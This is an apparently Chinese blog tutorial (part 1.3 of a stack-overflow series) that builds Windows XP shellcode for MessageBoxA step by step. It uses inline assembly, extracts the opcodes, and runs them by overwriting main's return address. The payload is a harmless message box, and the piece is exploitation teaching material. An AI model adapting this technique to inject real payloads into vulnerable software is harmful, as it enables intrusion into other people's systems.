栈溢出笔记1.3 准备Shellcode

最新推荐文章于 2022-10-06 00:19:46 发布
最新推荐文章于 2022-10-06 00:19:46 发布
阅读量3.3k 收藏 2
点赞数 4
分类专栏: 逆向工程 Windows内核 Windows编程 文章标签: 栈溢出 Shellcode Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hustd10/article/details/51108376
版权

经过1.1和1.2节的讲述,我们已经知道了如何更改EIP的值。程序执行函数之后将跳转到我们设定的位置开始执行,因此,我们需要准备一个自己的程序,接手后面的工作。这是一个什么样的程序?是一个C语言编写的代码?是一个可直接调用的exe?肯定不是,因为EIP所指的地址保存的内容为指令的操作码,CPU读取该操作码执行相应的操作。所以我们要准备的程序也应该是一段“操作码”。

继续写1.1中的Hello World,这次我们要把一个C语言编写的MessageBox换成一个只有“操作码”的程序。要获取操作码很容易,Immunity Debugger中显示出了每句汇编语句对应的操作码:

这里写图片描述
图19

上图就是调用MessageBoxA函数对应的汇编指令及操作码。

再正式写Shellcode之前,我们先编写一个汇编形式的MessageBox。我们当然不是用MASM,而是使用VC++的内联汇编__asm,这样就需要解决几个问题。

(1)内联汇编中无法定义字符串常量“example_1”和“HelloWorld”,我们如何定义它,并获取其地址?
我们无法用汇编语句中的db在内联汇编中定义字符串常量,但有一个东西在我们的掌控之下——栈,因此,可以将字符串硬编码压入栈上,同时可以获取其地址。

(2)内联汇编中没有API函数MessageBoxA,如何调用它?
没有了c语言之间调用的MessageBoxA,但通过example_1在Immunity Debugger中的调试,我们知道了MessageBoxA的地址(见图5),为0x77d507ea(未启用地址随机化,且不同机器不相同),这个地址在我的Windows XP SP3下是固定的。因此,我可以直接在汇编中调用该地址即可。

似乎没什么问题了,写出来如下代码:

/****************************************************************/
// example_3:内联汇编
int main()
{
    __asm
    {
        push    ebp
        mov     ebp, esp

        push    0x0000646c  // "ld"
        push    0x726f576f  // "oWor"
        push    0x6c6c6548  // "Hell"

        push    0x00000031  // "1"
        push    0x5f656c70  // "ple_"
        push    0x6d617865  // "exam"

        push    0
        lea     ebx, [ebp-18h]
        push    ebx
        lea     ebx, [ebp-0ch]
        push    ebx
        push    0

        mov     ebx, 0x77d507ea
        call    ebx

        add     esp, 18h
        pop     ebp
    }

    return 0;
}
/********************************************************* */

是的,不用头文件,也没有C函数(main除外)。编译运行它,然后炸了。。。
这里写图片描述
图20

0x77d507ea访问错误?这不是MessageBoxA函数函数吗?难道是我的地址找错了?用Immunity Debugger看看。
这里写图片描述
图21

这是main函数,可以看到中间我们用内联汇编写的代码基本保持原样。我们在CALL EBX上设断点,可以看到两个字符串及MessageBoxA的参数都已经被成功放入栈中:

这里写图片描述
图22

接着单步执行F7,发现CALL EBX跳转后没有任何指令,接着调试器给出了如下错误:
这里写图片描述
图23

查看以下内存空间,大概就可以发现问题了:
这里写图片描述
图24

是的,并没有0x77d507ea这个地址范围,也没有MessageBoxA所在的user32.dll。也就是说,程序根本没有加载user32.dll,这就是直接使用地址和通过API调用的差别,编译器不会检查0x77d507ea这个函数是否存在。

我们用简单的方法来验证这个猜想,用LoadLibrary加载user32.dll:

/****************************************************************/

#include <Windows.h>

int main()
{
    LoadLibraryA("user32.dll");
...
/****************************************************************/

好了,运行成功:
这里写图片描述
图25

但这不是我们想要的,我们不想要头文件,也不想要API调用。所以我们要再改一下,把LoadLibraryA也写入汇编中,LoadLibraryA位于kernel32.dll中,这个动态库是肯定会加载的。因此,找到LoadLibraryA的地址就行了,在我的机器上为0x7c801d7b。程序改为这样:

/*****************************************************************************/
// example_3:内联汇编
int main()
{
    __asm
    {
        push    ebp
        mov     ebp, esp

        push    0x0000646c  // "ld"
        push    0x726f576f  // "oWor"
        push    0x6c6c6548  // "Hell"

        push    0x00000031  // "1"
        push    0x5f656c70  // "ple_"
        push    0x6d617865  // "exam"

        push    0x00006c6c  // "ll"
        push    0x642e3233  // "32.d"
        push    0x72657375  // "user"

        lea     ebx, [ebp-24h]
        push    ebx
        mov     ebx, 0x7c801d7b 
        call    ebx // LoadLibraryA

        push    0
        lea     ebx, [ebp-18h]
        push    ebx
        lea     ebx, [ebp-0ch]
        push    ebx
        push    0
        mov     ebx, 0x77d507ea // MessageBoxA
        call    ebx

        add     esp, 24h
        pop     ebp
    }

    return 0;
}
/*****************************************************************************/

编译后运行成功。这样,我们把这段汇编代码的操作码抠出来运行,也应该可以达到同样的效果。先把操作码抠出来吧:

/*****************************************************************************/
55                   // PUSH EBP
8BEC                 // MOV EBP, ESP
68 6C640000          //PUSH 646C
68 6F576F72          //PUSH 726F576F
68 48656C6C          //PUSH 6C6C6548
6A 31                //PUSH 31
68 706C655F          //PUSH 5F656C70
68 6578616D          //PUSH 6D617865
68 6C6C0000          //PUSH 6C6C
68 33322E64          //PUSH 642E3233
68 75736572          //PUSH 72657375
8D5D DC              //LEA EBX,DWORD PTR SS:[EBP-24]
53                   //PUSH EBX
BB 7B1D807C          //MOV EBX,kernel32.LoadLibraryA
FFD3                 //CALL EBX
6A 00                //PUSH 0
8D5D E8              //LEA EBX,DWORD PTR SS:[EBP-18]
53                   //PUSH EBX
8D5D F4              //LEA EBX,DWORD PTR SS:[EBP-C]
53                   //PUSH EBX
6A 00                //PUSH 0
BB EA07D577          //MOV EBX,77D507EA
FFD3                 //CALL EBX
/*****************************************************************************/

去掉了尾部几句恢复EBP,ESP的语句,我们不再需要它,后面你将知道(但是首部的不能去掉,因为要用它寻址字符串),整理一下操作码:

/*****************************************************************************/
char opcode[] = "\x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F"  
"\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B"
"\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3";  /*****************************************************************************/

下面是测试程序:

/*****************************************************************************/
char opcode[] = "\x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F"  
"\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B"
"\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3";   

int main()
{
    int* ret;
    ret = (int*)&ret + 2;
    (*ret) = (int)opcode;
}
/*****************************************************************************/

测试程序中直接用opcode的地址覆盖了main函数的返回地址,程序执行效果如下:
这里写图片描述
这里写图片描述
图26

MessageBoxA成功执行,但是随后程序崩溃,这是正确的。因为我们覆盖了main的返回地址,opcode接管程序后无法再返回main中,程序跑飞了,无法正常结束。我们需要在opcode中结束它。需要再加一个ExitProcess调用,同样,我找到了它在我机器上的地址:0x7c81cafa。
将example_3中的最后两句:add esp, 24h, pop ebp 换为如下:

/*****************************************************************************/
xor     eax, eax
push    eax
mov     ebx, 0x7c81cafa // ExitProcess
call    ebx
/*****************************************************************************/

最后得到下面这个正常工作并退出的Shellcode:

/*****************************************************************************/
// example_4:MessageBox的Shellcode版本
char opcode[] = "\x55\x8B\xEC\x68\x6C\x64\x00\x00\x68\x6F\x57\x6F\x72\x68\x48\x65\x6C\x6C\x6A\x31\x68\x70\x6C\x65\x5F"  
"\x68\x65\x78\x61\x6D\x68\x6C\x6C\x00\x00\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x8D\x5D\xDC\x53\xBB\x7B"
"\x1D\x80\x7C\xFF\xD3\x6A\x00\x8D\x5D\xE8\x53\x8D\x5D\xF4\x53\x6A\x00\xBB\xEA\x07\xD5\x77\xFF\xD3\x33\xC0"
"\x50\xBB\xFA\xCA\x81\x7C\xFF\xD3";   

int main()
{
    int* ret;
    ret = (int*)&ret + 2;
    (*ret) = (int)opcode;
}
/*****************************************************************************/
hustd10
关注
专栏目录
栈溢出漏洞之shellcode编写
hgjiayou的博客
01-11 579
什么是栈溢出 会汇编的大佬肯定明白什么是栈溢出,在这里就不多说首先看一段C代码 含有溢出漏洞的C代码 #include <Windows.h> #include <stdio.h> #define PASSWORD "15PB" int VerifyPassword(char* pszPassword, int nSize) { char szBuffer[50] = {0}; memcpy(szBuffer, pszPassword, nSize); r
linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...
weixin_42386033的博客
05-12 558
shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。第二种是通过调用libc里syscall(64位)和sysenter(32位...
栈溢出攻击 shellcode 编写
Doub1's Blog
06-02 1078
栈溢出攻击 shellcode 编写引言shellcode 如何写思考有没有可以指定jmp的call呢?实现写汇编代码栗子: 引言 之前的文章写了原理在这:栈溢出攻击 原理 这次我们就讲讲shellcode怎么写,莫要再用msf当脚本小子了。 shellcode 如何写 思考 上一篇文章我们讲了攻击原理,我们可以覆盖掉EIP,使程序在ret时跳转到我们覆盖的地址,执行call。 但是这无法使其执行我们自己的汇编代码,因为我们目前能做的仅仅是覆盖ESP导致EIP错误,继续向下覆盖可覆盖掉参数。除非有一个C
【缓冲区溢出】栈溢出原理 | 简单shellcode编写
VI___
02-02 4773
一、Buffer Overflow Vulnerability ESP:该指针永远指向系统栈最上面一个栈帧的栈顶 EBP:该指针永远指向系统栈最上面一个栈帧的底部 缓冲区溢出漏洞的原理就是因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了,当函数需要返回的时候,由于此时的返回地址是一个无效地址,因此导致程序出错。 那...
shellcode栈溢出 2
wsss2009的专栏
04-14 947
本文给出一个完整的利用缓冲区溢出取得root shell的 示例,只要你照着步骤一步步下来,就不会觉得它的神秘, 而我的意图正在于此。如果看不明白什么地方,可以在这里 提问,mail to: ,或者到绿色兵团的 Unix安全论坛上提问,tt在那里。水木清华97年以前就大范 围高水平讨论过缓冲区溢出,你没赶上只能怪自己生不逢时。 测试: RedHat 6.0/Intel PII 目录
shellcode学习
weixin_52878095的博客
03-12 4875
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化
weixin_33787529的博客
09-20 579
本文讲的是Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化, 0x00 前言 在《Windows Shellcode学习笔记——shellcode栈溢出中的利用与优化》中对栈溢出的利用做了介绍。通过将返回地址覆盖为shellcode在内存中的起始地址,实现对栈溢出的利用 但是shellcode在内存中的起始地址往往不...
栈溢出crash小合集
11-15
栈溢出是计算机安全领域中的一个重要话题,尤其在软件漏洞挖掘和逆向工程中占据显著地位。本资源“栈溢出crash小合集”包含了作者通过自动化模糊测试工具AFL(American Fuzzy Lop)发现的一系列栈溢出导致的程序崩溃...
Pwn,我的栈溢出笔记就该这么写(上)
weixin_54150681的博客
12-05 206
一周的刨坟结束了,忙着搭建维护k8s,该整个小小的笔记了 原理篇 什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 栈溢出会导致什么结果? 栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。 如何防范栈溢出? (1).金丝雀(canary) 1、 在所有函数调用发生时,向栈帧内压入一个额外的随机 DWORD(数),这个随机数被称作 “canary”,函数执行完在返回之前,程序通过检查这个随机数
linux 64位 栈溢出,栈溢出中64位程序的处理方法
weixin_39717865的博客
05-13 1461
在做 pwn 题时,难免会遇到64位的栈溢出程序,处理32位和64位程序会有所不同。这里总结一下64位和32位程序的差异,并结合两道例题给出解题方法0x00 差异1.64 位函数调用需要使用寄存器传参,前三个参数存放在寄存器 rdi、rsi、rdx 中,32 位函数调用使用栈传参(具体看下面的例子)2.64程序一个存储单元占8个字节,32位占4个字节。所以在填充 ebp(rbp) 时会有差异,这是...
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件
05-06
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件,有两个不同的程序代码
栈溢出攻击和shellcode
LittleEmperor
09-16 6144
README 本文默认读者熟悉C语言编程和x86汇编语法,熟悉函数调用过程和调用规约,简单了解linux系统,包括进程内存布局,系统调用和内核内存管理机制,对栈溢出攻击有基本认知。 文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。 文章将抛开宏观层面的解释,尽量细致地阐述shellcode的构建过程和异常问题分析等诸多细节,帮助读者把栈溢出攻击和s...
winxpwin2003、win7、win8通用的shellcode
冷风
06-16 6726
此代码在vc6下直接编译,提取shellcode时进行debug模式,打开内存窗口,复制出二进制代码,整理成shellcode就可以了
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 548
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
关于 [栈溢出后jmp esp执行shellcode] 原理分析
lixiangminghate的专栏
11-25 6282
网上关于栈溢出后用jmp esp执行shellcode的文章有很多,感觉分析的都没有戳到点,所以想结合自己调试的经历写下自己的想法。 正常情况下,函数栈分布图如下:---->栈内存由低向高方向-----> |------------栈变量----------|----ebp----|------返回地址------|函数形参| 发生溢出后,以上栈空间的内容被覆盖,可能从上面的布局变成这样:
栈溢出 shellcode编写
weixin_43745072的博客
10-22 415
暴力破解 0x77e0000 或者 0xbff00000 开始搜索,通常是系统栈开始位置。 寻找"MZ"或者"PE"link shellcode exploit-db.com 栈溢出实例分析 环境:windows-xp;vc6.0 首先我们创建一个调用windows的api的弹窗程序messagebox.c //messagebox.c //https://blog.csdn.net/weixin_43745072 #include <windows.h> int main(int ar.
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 622
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
CTF-PWN-level1(Jarvis oj)[栈上shellcode的执行]
SuperGate的博客
02-14 883
checksec发现没有开保护机制,所以我们可以考虑使用shellcode方法pwn掉。 查看vulnerable_function函数内部 发现程序直接给我们了buf的首地址。点进去看之后发现,buf只能存0x88个字符,但是我们可以读入0x100个字符。由于读入的时候字符串会暂时存在栈上,我们可以考虑覆盖return的地址到buf的首地址中,然后在buf首地址开始写入shellcode...
深入探索:栈溢出Shellcode与安全漏洞
"is903技术手册是一个关于网络安全和漏洞利用的技术文档,主要涵盖了栈溢出shellcode、安全漏洞以及多平台安全等方面的知识。它提供了多个学习资源链接,帮助读者深入理解这些主题。" 栈溢出是网络安全中的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值